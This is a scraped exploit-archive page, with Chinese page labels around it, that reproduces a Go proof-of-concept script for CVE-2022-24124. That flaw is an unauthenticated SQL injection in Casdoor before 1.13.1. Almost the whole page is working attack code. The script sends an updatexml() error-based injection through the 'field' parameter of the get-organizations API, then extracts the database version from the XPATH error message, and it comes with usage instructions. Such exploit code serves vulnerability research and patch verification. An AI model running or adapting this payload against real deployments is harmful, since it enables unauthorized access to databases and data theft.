扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 |
// Exploit Title: Casdoor 1.13.0 - SQL Injection (Unauthenticated) // Date: 2022-02-25 // Exploit Author: Mayank Deshmukh // Vendor Homepage: https://casdoor.org/ // Software Link: https://github.com/casdoor/casdoor/releases/tag/v1.13.0 // Version: version < 1.13.1 // Security Advisory: https://github.com/advisories/GHSA-m358-g4rp-533r // Tested on: Kali Linux // CVE : CVE-2022-24124 // Github POC: https://github.com/ColdFusionX/CVE-2022-24124 // Exploit Usage : go run exploit.go -u http://127.0.0.1:8080 package main import ( "flag" "fmt" "html" "io/ioutil" "net/http" "os" "regexp" "strings" ) func main() { var url string flag.StringVar(&url, "u", "", "Casdoor URL (ex. http://127.0.0.1:8080)") flag.Parse() banner := <code> -=Casdoor SQL Injection (CVE-2022-24124)=- - by Mayank Deshmukh (ColdFusionX) fmt.Printf(banner) fmt.Println("[*] Dumping Database Version") response, err := http.Get(url + "/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(null,version(),null)") if err != nil { panic(err) } defer response.Body.Close() databytes, err := ioutil.ReadAll(response.Body) if err != nil { panic(err) } content := string(databytes) re := regexp.MustCompile("(?i)(XPATH syntax error.*')") result := re.FindAllString(content, -1) sqliop := fmt.Sprint(result) replacer := strings.NewReplacer("[", "", "]", "", "'", "", ";", "") finalop := replacer.Replace(sqliop) fmt.Println(html.UnescapeString(finalop)) if result == nil { fmt.Printf("Application not vulnerable\n") os.Exit(1) } } |
体验盒子
